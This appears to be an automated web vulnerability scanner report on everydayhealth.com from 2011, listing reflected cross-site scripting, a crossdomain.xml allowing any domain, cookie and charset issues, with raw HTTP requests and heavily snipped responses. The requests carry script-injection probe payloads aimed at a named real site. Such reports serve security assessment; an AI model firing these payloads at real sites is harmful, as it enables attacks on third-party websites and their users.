1. Cross-site scripting (reflected)
1.1. http://www.everydayhealth.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.everydayhealth.com/ads.htm [REST URL parameter 1]
4. Cookie scoped to parent domain
5. Cross-domain script include
6. Cookie without HttpOnly flag set
6.1. http://www.everydayhealth.com/
6.2. http://www.everydayhealth.com/ads.htm
8. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | / |
GET /?%00a7bfb"><script>alert(1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://corporate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 17 May 2011 14:30:38 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=AcxLM Set-Cookie: ASP.NET_SessionId Set-Cookie: ProductID=37; path=/ Set-Cookie: AOL_ReferrerList_37=%5b Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: SL_Audience=96|Accel Set-Cookie: SL_UVId=28F7CD9D9864EA45 Set-Cookie: SL_NV1=1|1;Expires=Thu, 19-May-11 02:31:41 GMT;Path=/;Domain= X-SL-CompState: Uncompiled X-Strangeloop: ViewState,Compression Content-Length: 72951 <!DOCTYPE html> <html xmlns="http://www.w3.org <head id="Head1"><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { ...[SNIP]... <meta property="og:url" runat="server" id="fburl" content="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.everydayhealth |
Path: | /ads.htm |
GET /ads.htmb21a6'%3bbc125ce4efd HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://www.everydayhealth User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: .ASPXANONYMOUS=AcxLM |
HTTP/1.1 404 File Not Found Date: Tue, 17 May 2011 14:30:56 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ProductID=37; path=/ Set-Cookie: AOL_ReferrerList_37=%5b Cache-Control: private Content-Type: text/html; charset=utf-8 X-Strangeloop: Compression Content-Length: 17245 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.everydayhealth.com |
HTTP/1.1 200 OK ETag: "02df0bd51cc1:3644" Accept-Ranges: bytes Content-Length: 369 Date: Tue, 17 May 2011 14:30:35 GMT Connection: close Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/xml ServerID: : USNJWWEB11 ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!--used for flash slideshows --> <cross-domain-policy> <site-control permi ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.everydayhealth |
Path: | / |
GET / HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://corporate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 17 May 2011 14:30:35 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=AcxLM Set-Cookie: ASP.NET_SessionId Set-Cookie: ProductID=37; path=/ Set-Cookie: AOL_ReferrerList_37=%5b Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: SL_Audience=700 Set-Cookie: SL_UVId=28F7CD9C32828122 Set-Cookie: SL_NV1=1|1;Expires=Thu, 19-May-11 02:31:39 GMT;Path=/;Domain= X-SL-CompState: Uncompiled X-Strangeloop: ViewState,Compression Content-Length: 72831 <!DOCTYPE html> <html xmlns="http://www.w3.org <head id="Head1"><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { head: new Date(), stack: [] };</script><script> __$1D3F = { deferred: [], deferScript: function(id, d) { __$1D3F.deferred.push( [id,d] ); }}</script><title> Health Information, Resources, Tools & News Online - EverydayHealth.com </title><meta id="tagDateModified" name="datemodified" content="2011/05/16 01:51" /><meta id="tagDescrip ...[SNIP]... |
GET / HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 17 May 2011 14:30:36 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=AcxLM Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: SL_Audience=277 Set-Cookie: SL_UVId=28F7CD9CDCB77769 Set-Cookie: SL_NV1=1|1;Expires=Thu, 19-May-11 02:31:40 GMT;Path=/;Domain= X-SL-CompState: Uncompiled X-Strangeloop: ViewState,Compression Content-Length: 72839 <!DOCTYPE html> <html xmlns="http://www.w3.org <head id="Head1"><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { head: new Date(), stack: [] };</script><script> __$1D3F = { deferred: [], deferScript: function(id, d) { __$1D3F.deferred.push( [id,d] ); }}</script><title> Health Information, Resources, Tools & News Online - EverydayHealth.com </title><meta id="tagDateModified" name="datemodified" content="2011/05/16 01:51" /><meta id="tagDescription" name="description" content="Health resources and personalized health tools. Information and news on depression, digestive health, diabetes, breast cancer, cardiovascular health, and much more." /><meta id="tagKeywords" name="keywords" content="health resources, health information, health tools, health news" /> <meta property="og:title" content="Health Information, Resources, Tools & News Online - EverydayHealth.com"/> <meta property="og:description" runat="server" id="fbdescription" content="Health resources and personalized health tools. Information and news on depression, digestive health, diabetes, breast cancer, cardiovascular health, and much more." > <meta property="og:type" content="article" /> <meta property="og:image" content="http://images <meta pro ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | / |
GET / HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://corporate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 17 May 2011 14:30:35 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=AcxLM Set-Cookie: ASP.NET_SessionId Set-Cookie: ProductID=37; path=/ Set-Cookie: AOL_ReferrerList_37=%5b Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: SL_Audience=700 Set-Cookie: SL_UVId=28F7CD9C32828122 Set-Cookie: SL_NV1=1|1;Expires=Thu, 19-May-11 02:31:39 GMT;Path=/;Domain= X-SL-CompState: Uncompiled X-Strangeloop: ViewState,Compression Content-Length: 72831 <!DOCTYPE html> <html xmlns="http://www.w3.org <head id="Head1"><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | / |
GET / HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://corporate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 17 May 2011 14:30:35 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=AcxLM Set-Cookie: ASP.NET_SessionId Set-Cookie: ProductID=37; path=/ Set-Cookie: AOL_ReferrerList_37=%5b Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: SL_Audience=700 Set-Cookie: SL_UVId=28F7CD9C32828122 Set-Cookie: SL_NV1=1|1;Expires=Thu, 19-May-11 02:31:39 GMT;Path=/;Domain= X-SL-CompState: Uncompiled X-Strangeloop: ViewState,Compression Content-Length: 72831 <!DOCTYPE html> <html xmlns="http://www.w3.org <head id="Head1"><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { ...[SNIP]... <meta property="og:url" runat="server" id="fburl" content="http://www <script type="text/javascript" src="http://connect <script language="javascript" type="text/javascript" src='http://tracking ...[SNIP]... </script> <script type="text/javascript" src="http://platform ...[SNIP]... <!-- Modules --> <script src="http://connect ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | / |
GET / HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://corporate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 17 May 2011 14:30:35 GMT Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=AcxLM Set-Cookie: ASP.NET_SessionId Set-Cookie: ProductID=37; path=/ Set-Cookie: AOL_ReferrerList_37=%5b Cache-Control: private Content-Type: text/html; charset=utf-8 Set-Cookie: SL_Audience=700 Set-Cookie: SL_UVId=28F7CD9C32828122 Set-Cookie: SL_NV1=1|1;Expires=Thu, 19-May-11 02:31:39 GMT;Path=/;Domain= X-SL-CompState: Uncompiled X-Strangeloop: ViewState,Compression Content-Length: 72831 <!DOCTYPE html> <html xmlns="http://www.w3.org <head id="Head1"><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | /ads.htm |
GET /ads.htm HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://www.everydayhealth User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: .ASPXANONYMOUS=AcxLM |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT Accept-Ranges: bytes ETag: "02df0bd51cc1:3644" Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET Date: Tue, 17 May 2011 14:30:42 GMT Set-Cookie: SL_UVId=28F7CD9C196C0B59 X-SL-CompState: TouchUp X-Strangeloop: ViewState,Compression Content-Length: 2134 ...<html> </html> <html> <head><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { head: new Date(), stack: [] };</script><script> __$1D3F = { deferred: [], deferScript: function(id, ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | / |
GET /robots.txt HTTP/1.0 Host: www.everydayhealth.com |
HTTP/1.1 200 OK ETag: "026e9129ccc1:3644" Accept-Ranges: bytes Content-Length: 7912 Date: Tue, 17 May 2011 14:30:35 GMT Connection: close Last-Modified: Fri, 06 May 2011 20:09:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/plain ServerID: : USNJWWEB11 User-agent: AdsBot-Google Allow: / Disallow: User-agent: Mediapartners-Google Allow: / Disallow: User-agent: adidxbot Allow: / Disallow: User-agent: MSNPTC Allow: / Disallow: User- ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | /ads.htm |
GET /ads.htm HTTP/1.1 Host: www.everydayhealth.com Proxy-Connection: keep-alive Referer: http://www.everydayhealth User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: .ASPXANONYMOUS=AcxLM |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT Accept-Ranges: bytes ETag: "02df0bd51cc1:3644" Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB11 X-Powered-By: ASP.NET Date: Tue, 17 May 2011 14:30:42 GMT Set-Cookie: SL_UVId=28F7CD9C196C0B59 X-SL-CompState: TouchUp X-Strangeloop: ViewState,Compression Content-Length: 2134 ...<html> </html> <html> <head><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { head: new Date(), stack: [] };</script><script> __$1D3F = { deferred: [], deferScript: function(id, ...[SNIP]... |